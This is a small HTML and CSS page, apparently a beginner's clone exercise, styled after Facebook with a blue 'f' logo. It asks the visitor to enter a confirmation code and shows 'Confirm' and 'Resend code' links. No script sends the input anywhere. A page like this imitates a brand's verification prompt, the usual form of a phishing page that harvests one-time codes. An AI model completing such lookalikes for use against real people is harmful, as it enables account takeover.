<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Page 1</title>
    <style>
        p{
    width: 47px;
    height: 60px;
    font-family: Arial;
    margin-left: 600px;
    margin-top: 70px;
    padding-left: 13px;
    padding-right: 0px;
    padding-top: px;
    padding-bottom: 0px;
    color: white;
    background-color: rgb(0, 119, 255);
    border: none;
    font-size: 90px;
    border-radius: 50px;
    align-items: center;
}
h1{
    margin-left: 560px;
}
h6{
    margin-left: 450px;
    font-size: 20px;
    color: gray;
    margin-bottom: 0px;
}
input{
    margin-left: 540px;
    padding-left: 5px;
    width: 200px;
    padding-top: 5px;
    padding-bottom: 5px;
    padding-right: 5px;
    margin-top: 30px;
    border: 2px solid gray;
    border-radius: 13px;
    background-color: white;
    margin-bottom: 0px;
    display: block;
    display: inline-flex;
    margin-right: 30px;
    display: inline-block;
}
a{
    color: black;
    margin-top: 40px;
    margin-left: 550px;
    display: block;
    text-decoration: none;
    font-size: 20px;
    background-color: white;
    width: 140px;
    padding-top: 5px;
    padding-bottom: 5px;
    padding-right: 5px;
    padding-left: 30px;
    border-radius: 13px;
    border: 2px solid gray;
    font-weight: 700;
}
.ata{
    background-color: rgb(0, 119, 255);
    border: 2px solid rgb(0, 119, 255);
    width: 80px;
    height: 30px;
    padding-left: 10px;
    padding-bottom: 0px;
    border-radius: 13px;
    cursor: pointer;
    display: inline-block;
}
    </style>
</head>
<body>
    <div class="body">
        <p class="facebook logo">
            f
        </p>
        <h1>
            Welcome! 
        </h1>
        <h6>
            pls enter the confirmation code we sent you.
        </h6>
        <input type="number" placeholder="confirmation code">
        <a class="ata" href="/none.html">Confirm</a>
    </div>
     <a href="/more.html" target="_blank">Resend code</a>
</body>
</html>